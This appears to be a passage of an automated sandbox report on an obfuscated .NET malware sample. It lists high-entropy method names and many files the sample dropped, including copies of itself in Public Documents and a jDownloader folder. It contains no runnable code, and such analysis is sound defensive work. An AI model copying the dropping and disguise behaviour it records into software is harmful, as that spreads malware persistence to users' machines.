Source: vb8DOBZQ4X.exe, Oe7IGt6rwCVnfPCK9KO.cs	High entropy of concatenated method names: 'method_0', 'h59', 'R73', 'Vp56RtyxnF', 'A9yvDBX5JJ2dPREsPE0h', 'WX8fwUX5aTIFV2cy7QGL', 'RUp82UX56u2PB8PtBVrt', 'iV3RcpX5x8WHwIUrPsU3', 'xICAS7X55dLwDkOUOPCm', 'P3F2bwX5NgXfyKiwqP2H'
Source: vb8DOBZQ4X.exe, KB2Dyi2AUfviXbY15cZ.cs	High entropy of concatenated method names: 'yMf2gS0s6s', 'ORRBSgXRClfMyRZFNFtM', 'G90GaOXRtSB2tYn9xh1V', 'FS8904XRHZ9VDem8gIj8', 'kdCIo2XRGtDNsql8dtIC', 'FrYZyZXREov6favKtxBn', 'XhU2QYXNEu', 'gIc2bZRxHt', 'r0B2UqvqFr', 'rXK2WiVUby'
Source: vb8DOBZQ4X.exe, Gtojn9l19x0YGaEWY71.cs	High entropy of concatenated method names: 'zGDlkksG6t', 'qZnliBUlso', 'qi7lrqkPkK', 'LNplTpJEwn', 'PA4lRaFwvk', 'KbAl0YHBWn', 'xjh0juX0JJiTeBpNDYKE', 'vHjU2pX0aqo62VKZcxsL', 'Ygg7OGX06HWcIMBAJThU', 'OxJib7X0xnH0yeZmj7vA'
Source: vb8DOBZQ4X.exe, YbJ2BFgaP4qfTqtyvyF.cs	High entropy of concatenated method names: 'Jf3gxBZREP', 'Q30g5G6Mkd', 'glDgNeFVnS', 'mXfgB9DQrl', 'FesgYEFuVh', 'FJW0YMXu6aYt59BE2nWj', 'W3DlXLXuJheRy6EaKlsi', 'Kml1GeXuaaRn8vgPu5bX', 'qeAXW9Xux7lsBrhKoZL7', 'n3DVIPXu5hstHxFdTfiO'
Source: vb8DOBZQ4X.exe, kENVZmRefGrM7HN2kER.cs	High entropy of concatenated method names: 'syWRa4oZbJ', 'k6r', 'ueK', 'QH3', 'rp6R6j1DMB', 'Flush', 'HeDRxGDRNp', 'g0OR5MwEcR', 'Write', 'Ip9RN2igGt'
Source: vb8DOBZQ4X.exe, gnijkAW3pMmGXO0IyJo.cs	High entropy of concatenated method names: 'uAhWriceKk', 'alSWhd3vwy', 'FM0WvqZj15', 'QynWMgucnn', 'hCMWoeEskj', 'MmgWyZeyBB', 'nHhWmE04DJ', 'FQZWFjroI8', 'bpIWVr9Ll1', 'w7yWAbmvDh'
Source: vb8DOBZQ4X.exe, g0RSCbsGgRxD5PnwtNR.cs	High entropy of concatenated method names: 'jvPsYvku8p', 'egNbHwXrpla8npnmeE1V', 'lKuTUSXrZFejhES0HoQc', 'i2GMmAXrjJ2SULCQHDc4', 'Dfos26Xrs513vcmQAeXo', 'P79EAfXr3R2JF1OTO10l', 's1DALFXrl9Za2AfTNsca', 'DxBatSXrDmuaJ3mclpZg', 'PU6fEDXr7G2yeWyom2Tc', 'eAFpZlBu4J'
Source: vb8DOBZQ4X.exe, ksQWmTX6swI3yqD49x5.cs	High entropy of concatenated method names: 'P9X', 'NGaX5AQYmq', 'oLGXl45HpFi', 'imethod_0', 'zwyXN9jTfy', 'isDWeOX150ntGOGAZ6yr', 'RY0Du2X1NUjnbBUkJq7N', 'VktkEYX16pMmguIdexWe', 'mvuVr7X1xnlhrQgqpRtK', 'fKJiTfX1Bu1lT5snZ13a'
Source: vb8DOBZQ4X.exe, S5lfIMTQwAIwnHOviQS.cs	High entropy of concatenated method names: 'a0FRMfK8AC', 'B3QGdKXezVO2US0dHrpy', 'jKDFOxXeYTm0d3fhwIN4', 'PFyRYVXew5eesYPxNIOb', 'FuOutCXJ4RPBowgrJ7w9', 'kt5', 'sDITUhFaxE', 'ReadByte', 'get_CanRead', 'get_CanSeek'
Source: vb8DOBZQ4X.exe, ggbLTaQyLNVfuIrvBr7.cs	High entropy of concatenated method names: 'Fr69A2XEbBiBggbZlZnn', 'm3PeEuXEUKJmOyFEVmrf', 'W0va4nXEW70ObfGsU7fQ', 'DUDvGDXEnGGl5MOQUGZg', 'ddXBH3XEQhwXI1JhfIlu', 'method_0', 'method_1', 'c06QFwApgG', 'nktQV36eNx', 'qx1QAFbn0t'
Source: vb8DOBZQ4X.exe, aPyL4ZgwbMjpB8cVlm9.cs	High entropy of concatenated method names: 'VNhk4MIwcs', 'OPqkXEHRNu', 'WIwkLVpnWJ', 'U5Rkjfft9c', 'qMaksKGm7o', 'zH6kp6E5f3', 'sJkCd8XdXZk95DHrTk4H', 'FMopBRXuzq1YpAHw01pc', 'JCp7i6Xd4JCwZ7abhfSE', 'sHCg97XdLajKgJin6iXp'
Source: vb8DOBZQ4X.exe, TqxwP2jKtsEYPCFwDjg.cs	High entropy of concatenated method names: 'aMkjECIClx', 'OHQjSiVSEb', 'acNjfbZg2R', 'dOHux3XkE4U4Xav93Fse', 'RErOEDXkSQIDyIOiOjes', 'bUk160XkCr3W5Oe2djQf', 'NcqApsXkte2KyAFIZKEt', 'YHQjgP4b2Q', 'ubYjkyU4bh', 'XJfjiIVIFF'
Source: vb8DOBZQ4X.exe, itXeLKpDdlom2AcjXZk.cs	High entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'S7rXlp8BX7Y', 'xJCXsX6csbC', 'G0jMrvXrVNrLVRNGvotM', 'TbrSC9XrAyhHK0m6FigP', 'OG5Iv6XrnsF3uEES8Lhj', 'GbUE00XrQahOCQgWvfjC'
Source: vb8DOBZQ4X.exe, LcBK9m5COmO0762a092.cs	High entropy of concatenated method names: 'method_0', 'method_1', 'FZF5EsN4kw', 'CEl5SDY8SI', 'hUY5fncGUI', 'Dispose', 'WYgnPZXBPaQWoh0GIa6T', 'AqB1MyXBHJiHrtQiBfiX', 'RSXxG9XBGAkUTfLZARI4', 'Tue7wLXBC06NURyomg17'
Source: vb8DOBZQ4X.exe, aaDTPpl8NNgNVDX2vAS.cs	High entropy of concatenated method names: 'cyLl5RSK7H', 'Qy6ZxJXq3iOECdmEujdf', 'KuvuOSXql7j7SbKtUooW', 'cOqXjBXqDn5iu6PcYKFl', 'RcORBbXq7I3Br1yj3i0N', 'O6QFOaXqhqBETEBxTZsA', 'P9X', 'vmethod_0', 'ojDXs1VOp6S', 'imethod_0'
Source: vb8DOBZQ4X.exe, x7RUQ0g8gjXF8fhC9AU.cs	High entropy of concatenated method names: 'Al2gdRDxlJ', 'S3Kg9GduoI', 'pZvge1KVuP', 'EIn2W6XutQOr7Vsk2reA', 'CDNwf0XuE3kv4gemoRRu', 'mX2mykXuSFQ8847QNZwN', 'Cmode6XufPwqj4dMax5M', 'kQr3LoXu8TvmdtYkJA23', 'tq8IerXuuqwRuHSAJkho', 'RifvI6XudL561Z6Fys03'
Source: vb8DOBZQ4X.exe, OLOn5Jo7XiQvTANUVeA.cs	High entropy of concatenated method names: 'Dispose', 'bTAovZBxL1', 'hiLoMQVaFE', 'eFyoo8P9tp', 'EXY0IFXHL66lmrsP2foE', 'uTxWCoXHjc5doH49g7gD', 'AC0D4SXHsG8XZUbeSORW', 'wqXQ39XHp4KQjr0wFePw'
Source: vb8DOBZQ4X.exe, gwxcDgbvRM6x5FZ3OLM.cs	High entropy of concatenated method names: 'HhUWX2ZdgP', 'c2NPdiXSrR9yQd51Bkis', 'CT7PapXSk6gB3Ue9PJvU', 'wfDiSAXSiT49BcSjF8ER', 'mPExwPXST4Unwguyg1Ur', 'Wr2boR2j1A', 'VrCbyrtRu3', 'qCrbm97paO', 'zUEbFabyCG', 'utXbVGDBBf'
Source: vb8DOBZQ4X.exe, HG1spFQ71VLLEQkmZMu.cs	High entropy of concatenated method names: 'Rrr', 'y1x', 'bagXlb8KpXy', 'uTOXlULhka7', 'FyASfFXtYVqJUhGAbb0Q', 'cJ8wyFXtw8faUyp28H6Y', 'KugKrVXtzhnVihZkNQ6Q', 'CtuvraXE4YdjOAuNMH82', 'FoetVIXEXyEcOBB1VTgM', 'F3CHTMXELljv2s7mbBKx'
Source: vb8DOBZQ4X.exe, eVcTH4nMiaZ6GRLcZPt.cs	High entropy of concatenated method names: 'EqMnn6tUt0', 'pxGwbVXt4jcsZLOKZff3', 'PpF7gmXCwFpu5UtmbtKX', 'C9lHNfXCzSZrGwcLAjO6', 'U777v7XtX473SxSUyYNW', 'D9XnyuDj1x', 'M7X5AtXC6esI5VNMdwg3', 'VHeGNEXCJVB6wRSJ55Ny', 'FM7BX2XCaiQZ7HbkkWFp', 'B3gHQKXCx7Ofqo99hrx3'
Source: vb8DOBZQ4X.exe, OuQm9MAgQj3Iuu96Phk.cs	High entropy of concatenated method names: 'QklAcTeALO', 'NrUdseXCD9QYXGQdk4rt', 'mZ0EJOXC2I7bnoYlZs0h', 'g4XNPkXClvArV3rH8eU1', 'cv6p9DXC3VV5qDwXvAIi', 'rvVAiwKWmB', 'NcXArKAWw8', 'BG4ATsQnlC', 'zsTmIDXCjdTVYLTvoX30', 'PNWy7YXCsxfUtgaAd6HO'
Source: vb8DOBZQ4X.exe, Dd1wIi2tgPF51ncLdUP.cs	High entropy of concatenated method names: 'ECO25GS0ef', 'Cbn2N2qLwP', 'RmB2luX02oBR35x3pYaI', 'KA82vHX0pKp5veTltlJb', 'wkXmZeX0ZLTr8r5kc2lR', 'dKKK8oX0laAhwCWwagxb', 'Fcf2Sjujnb', 'CM72ffjKro', 'KVH285rjSf', 'QQg2uxAoM2'
Source: vb8DOBZQ4X.exe, TF5daCnSBogPOJ0v3CY.cs	High entropy of concatenated method names: 'rZBn8vdCpx', 'mJvnuOJeuF', 'abbndnywpf', 'Uu4hITXtOwp2cHehYdAD', 'raUWtOXtWcpkZjV7yVxs', 'w83AoiXtIpOaD8TyHxYM', 'JijDRbXtKEP5pmXGB9Eg', 'G3rc8YXt1aDJiTVEbVFU', 'Gs63U0Xtg9Pstxxa6cKT'
Source: vb8DOBZQ4X.exe, ly6Y5bN497ZqVuL1pZ2.cs	High entropy of concatenated method names: 'Gs8NsoqWDw', 'bH7NpMQE9X', 'sarIi5XBBjnPD5GIaRwa', 'NA0q11XBYxmZWcOXqPKT', 'CLe5iDXBwAqRQLbvbpyf', 'By345mXBzW6oDGeC7wK0', 'vcVNLW8ZRJ', 'JA5TOQXB6IFJebG7y93A', 'D093c8XBxu2e2ShvQ5nq', 'vVkTgoXBJCg9mHxu24Vj'
Source: vb8DOBZQ4X.exe, PivUu9nHH5OlgQlFV2F.cs	High entropy of concatenated method names: 'N2N', 'HELXloOfakr', 'oItnCci9Oe', 'mRsXlyyaUjp', 'xMPbJ4XtAAkpbm0P97d6', 'SYehHYXtn9UK0ghlhCB3', 'MHUSVoXtFcr5sVEZbPKY', 'bqgpJmXtVOwsuQ9RFo8g', 'gov1MfXtQESCshuO5v0V', 'uKpo4tXtbWFTS2uDEgmn'
Source: vb8DOBZQ4X.exe, ctF5RxpSjsEymmkqNOu.cs	High entropy of concatenated method names: 'VHIp9NyUSN', 'XQLiZoXTLqfbXdgHAiRB', 'qqVidcXT4AyptHJFjDGA', 'IDuQTkXTXNshs3D8qObQ', 'u6ag7ZXTjVvI5kedBj7c', 'QumpmgXTsYFUDfQtct9s', 'U1J', 'P9X', 'rHHXsyKtTgj', 'bKOXsmgdTX1'
Source: vb8DOBZQ4X.exe, g4MRkXA66jP1JwOx0RR.cs	High entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'rxbXlvM828n', 'Nd1Xs81aQWG', 'orJw2dXCKRBuLn6m8gdo', 'xIckWOXC1P1I77SMgkr3', 'ecQIRkXCgGMLxopyTjK7', 'z0ODryXCkK0ivm9lamNK', 'eQrWRnXCi7T1d2LOT9Ct'
Source: vb8DOBZQ4X.exe, s7XxKOOWWW7Lk8V7yqt.cs	High entropy of concatenated method names: 'hfBOOnVMo0', 'kBdOKAsZK6', 'LDeO1kwpow', 'bRNOgHGOmB', 'tSlOk7Au8N', 'CklhCjXf5qWwXNR5sJcZ', 'TZaOsAXfN0wZltYROCqQ', 'G8nU1gXfB0vSqLeLu6vK', 'MBfLyHXfYPBD5uS4wP7M', 'wtO9XiXfwXRss7LwsYLY'
Source: vb8DOBZQ4X.exe, hBFn7RNFV7H302st7w2.cs	High entropy of concatenated method names: 'dbm7BLXYmGGZmpFGlUeB', 'bx5BdyXYFdQvTutxGg5U', 'WPkB6TwhSH', 'NGLQliXYQ2kIV7W6HKNg', 'FHqVcsXYbbj2V0oJLwGv', 'TOLoawXYU9miLKkRtUIL', 'qn4nkkXYW8LNlmyJeh95', 'FhdP45XYIJde1Qe56ajK', 'pkOy4YXYOtepQOw1YAoy', 'yClXFfXYKmSmBVp2cpSL'
Source: vb8DOBZQ4X.exe, ohpB8FpyWd8sw2Bygvv.cs	High entropy of concatenated method names: 'E3kp1PduI9', 'BFKpgS3lfv', 'Rwqpk2jXO2', 'wmV61jXrt6wUtql148Bo', 'AorROwXrGDYvOFlkR5mW', 'EC8hGxXrCSludMSF87F6', 'zGVpWqW7j7', 'Rg5pIiZpGc', 'eibXSCXrPteS5BtrHfax', 'vrueZVXrqfRDHn5hIZpn'
Source: vb8DOBZQ4X.exe, SPhQgvYVuZkq7TbYV01.cs	High entropy of concatenated method names: 'mMHYk521iG', 'C3JYiZsMLs', 'Tx9YrxjLp7', 'UyAYT74HJ7', 'P9YYR3GEkh', 'PHBY0eg9TS', 'RGnYqOXEqi', 'kxYYcP50le', 'edKYPVYNum', 'veJYHpeI6m'
Source: vb8DOBZQ4X.exe, ogMT05LpEh06S2AZ5EY.cs	High entropy of concatenated method names: 'mafL2RJrpR', 'DBdLllcWLF', 'kO0LDVZ8tA', 'LFAL3B7F8v', 'yg2RO7XgoVvkgt2qZU78', 'JajrL1Xgv3rvgA3xC3JG', 'fP7vSRXgMT76XmyZ4ZGO', 'xMoosuXgytX3GamhZsJ7', 'j4jSZTXgmej5bI1KDoHq', 'Sc5LxqXgFNkkHLLCGEWh'
Source: vb8DOBZQ4X.exe, XcET525rFNnQpxDYCYX.cs	High entropy of concatenated method names: 'WIC5RJIvbM', 'q1T50u5rGn', 'ENH5qLleqL', 'hWI5clMcrE', 'Dispose', 'TYdLDtXBrq2sW36JvWXN', 'smuPMaXBklLfEVDg09Ov', 'pIyaeuXBiFiCyaLraBRN', 'xR1dBvXBTZNP3hLS1kRs', 'SZmZeYXBRyhFwGTE29V2'
Source: vb8DOBZQ4X.exe, vfxQORn9kpFvTyKkxOv.cs	High entropy of concatenated method names: 'j1CXlm24ggw', 'bBKnJ0Pvro', 'hkuXlFEVHdc', 'w8TPpoXtTpQV1YJPRnca', 'VmAiVuXtR7r0sRG2qo5K', 'Kf0jHgXtiGZWoUrO21BC', 'IS4fxmXtrB4FrL5kXsa0', 'sjvvvIXt0wDE1Wh7Ji6x'
Source: vb8DOBZQ4X.exe, YGAZ7NK7apbPX9EAqxb.cs	High entropy of concatenated method names: 'y4pKv4IeFe', 'haJKMwX42G', 'UQPKoSi7Ba', 'icCKy0pwej', 'fipKm6rQe6', 'AIwbUkX8yPABfhCNFvto', 'yV7EldX8MK61RnHqAqc6', 'vnGMaFX8oAyX5ntp2qtc', 'J1bcpoX8mxg3HWEHSX5I', 'AY0bwkX8FP4jeyahnb1n'
Source: vb8DOBZQ4X.exe, ugRwSLAHkRwbjKdZLCV.cs	High entropy of concatenated method names: 'I1UA8KxVF4', 'WXAAuO2aJe', 'zRMAdh654X', 'PLa70DXCVwXdomfBTp19', 'YU4CcxXCATpcyIhfEjAl', 'qGprrBXCm1evegNE8Bph', 'jICEFBXCFgoOQMVSGVKA', 'R3IACo3QAh', 'zLmAtuTyLY', 'xAwAEVFE1w'
Source: vb8DOBZQ4X.exe, uqnTrTlmsWdxy8cV4Js.cs	High entropy of concatenated method names: 'M8ClnEhfVw', 'sClUTiX0R7d3KnEl6dcQ', 'vAp4PFX00fS0vGI3heye', 'rFaMtdX0qpAJ7dFCyDn7', 'iyalVdlhdF', 'URAHISX0gTB0FV7OGgxn', 'uRhEgpX0kN89LdYIPyoC', 'MaAgGhX0ijADLUkm3Pac', 'MAxHaIX0KjClC0shZOB8', 'o8X4uSX01BACqb8y87QN'
Source: vb8DOBZQ4X.exe, EkEBgAS96dvsFJH84x.cs	High entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'ejN8uX8Nb'
Source: vb8DOBZQ4X.exe, MeT53TrBF9bV2Y2suT3.cs	High entropy of concatenated method names: 'IHKrwk7GKX', 'eEorzMvQOX', 'fCGT4hga2c', 'E1BTXyU8Ux', 'p0yTLupXEV', 'VSBTjPbve5', 'Rpx', 'method_4', 'f6W', 'uL1'
Source: vb8DOBZQ4X.exe, GUY4OEsThebjigVFYhw.cs	High entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'HRMXlsBU2nu', 'xJCXsX6csbC', 'TE86jKXiqmaIdViB4YI9', 'XEIsy2XicngRm1pfDiDv', 'QU7ogSXiPM1pIFGm6sGu', 'GvUwq3XiHKLO6I3D0cBk', 'SL8mR0XiGeDSIU0R4B5W'
Source: vb8DOBZQ4X.exe, EsjRQrGr1fRC14bj7yj.cs	High entropy of concatenated method names: 'b05GR2eL39', 'H4XG0SS4lV', 'OFrGqoR39T', 'LOEGcFcHDA', 'BSoGPjnGCr', 'YMyGHr09VX', 'O93GGbkFpq', 'PvZGCN46em', 'rXQGtC5MVH', 'BIeGE1wDeo'
Source: vb8DOBZQ4X.exe, oAoJ3UXw9i1ZlMQqtS2.cs	High entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'jhQXlXZpkgK', 'xJCXsX6csbC', 'g9P5mZXg4pmT7nkkYEgC', 'RFxp8OXgXFqh53ns1Amp', 'vauvIEXgLCf5vakSw9IF', 'f2DcSrXgjYCkWFWleAcT'
Source: vb8DOBZQ4X.exe, d0XbpajeoIHmdtOadtA.cs	High entropy of concatenated method names: 'd7Msjuhnle', 'qUMssagsPB', 'pGUspXK2lB', 'ABKv9AXisFEQYpA9MiHm', 'n77w6pXippF8NGDPLi83', 'LyWekuXiLpa4PB5u9xEy', 'q0bdeIXij7HObVvDKggh', 'xUUs77LItn', 'jDmielXiDvH3TOb6urE5', 'sruaXoXi2fyAZ28wJ55j'
Source: vb8DOBZQ4X.exe, JWyE0mWJmSaFauBf9DL.cs	High entropy of concatenated method names: 'EqPW6fckA2', 'dQ0Wx8iEdU', 'QPvW5b7n84', 'cHrWN8sR4m', 'c0gWBitI9B', 'vG3ZdQXSwFaJUvthjbmC', 'gqFncYXSBGjtYd3IA6FS', 'lv6nCaXSYnxZogALrVaV', 'vJGTquXSzD1IwRpeupaf', 'hBOPOVXf428Kneu8smTY'

Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\UHOiAYcz.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\EcmNwYns.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\MitCbspL.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\bwSQzEwi.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\jhXaeGlG.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\itiylxdQ.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\dTEysZYC.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\sZJgMJEc.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\AnBXspYe.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\npkPtdTK.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\bzhjaotg.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\bBmjeBfL.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\YAYBVQfz.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\cBFZJSYc.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\IEuUpfEB.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\XEBuDdCj.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\QNHtupkd.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\IhuDGjiQ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\ihTQsugx.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\ohOpBzSD.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\YGvPWYoG.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\eAktcfLt.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\DeVdhSGw.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\MEDBuDSi.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\VCjBMLrF.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\QeOLILef.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\KBRTYUOn.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\yGbhhxRG.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\RMYUaxxv.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\qVSxnNNB.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\fMYqQhPK.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\cttYUELd.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\gsThGkmc.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\cJprnBzi.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Program Files (x86)\jDownloader\config\GSwhJpqdkmruXxiphyV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\HzekDlJr.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\JcGsBzAN.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\mwiZumHK.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\iPKZlQUF.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\CGYwsYXe.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\LLCKvMGi.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\BoVNXGRv.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\wNvWPtSq.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\hJupzWZv.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\keuZOuus.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\lbnIQCXF.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\UqASurOe.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\eQfHOZnx.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\KsQEGBOR.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\qUjZTVbT.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\rpuWqKyh.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\DCRfugzr.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\aCjqmULK.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\KeYvlRxi.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\thNpVJYz.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\gZGZiBsl.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\yjTManQC.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\WWrklrjU.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\UFHtrLcK.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\WLgLezrK.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\CdYNaVtP.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\edcYVUJp.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\VPbJhuHo.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\PKGckfmR.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\agdAFVnw.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\user\Desktop\jDxFqWCl.log	Jump to dropped file
Source: C:\Users\user\Desktop\vb8DOBZQ4X.exe	File created: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\zVsflLNl.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\mxRxOeus.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\JgaLgwjq.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\YRuAcrMJ.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\oPLHggMU.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\BuzfybGV.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\AqtFBGCA.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\NZaMcRbY.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\RvvRuIkR.log	Jump to dropped file
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	File created: C:\Users\user\Desktop\aykSTqhz.log	Jump to dropped file
